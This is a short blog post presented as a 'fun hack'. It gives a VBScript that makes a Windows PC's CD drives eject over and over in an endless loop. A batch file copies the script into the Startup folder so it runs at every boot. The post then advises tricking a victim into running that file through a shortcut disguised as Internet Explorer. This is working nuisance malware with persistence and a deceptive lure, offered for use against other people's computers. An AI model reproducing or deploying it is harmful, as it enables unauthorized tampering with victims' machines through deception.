Paid To Popup Hacking Articles: CD Drive Hacking: A Fun

CD Drive Hacking: A Fun

Hey guys, wanna have fun-hacking with ur CD drive. Copy the following code to notepad, and then save as CDfun.vbs, remember the extension ".vbs". Now double click on the file you just made, your cd drive will now repeatedly starts moving in and out. The code is as;

set wmp = createObject("wmplayer.ocx.7")
set drives = wmp.cdromCollection

sub open_saysame()
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count - 1
drives.item(i).eject()
next
end if
loop
end sub

open_saysame()


Now this is funny but what if it was even funnier. What if every time you started you r computer it loaded? that could make it even better... so open a new notepad document (blank) and insert this code into it NOTE: numbered to show which line it is.

1:)copy CDfun.vbs "c:\Documents and Settings\%username%\Start Menu\Programs\Startup\"
2:)CDfun.vbs

Save this as run.bat, now comes the fun part. all you need to do is get them to somehow open this run.bat. there are many ways. one way is to make a shortcut to it called "internet Explorer" and right click to change properties on icon. that way it will look just like Internet Explorer.

This knowledge is donated by Jai prakash, jai1147@gmail.com, thanks to Jai!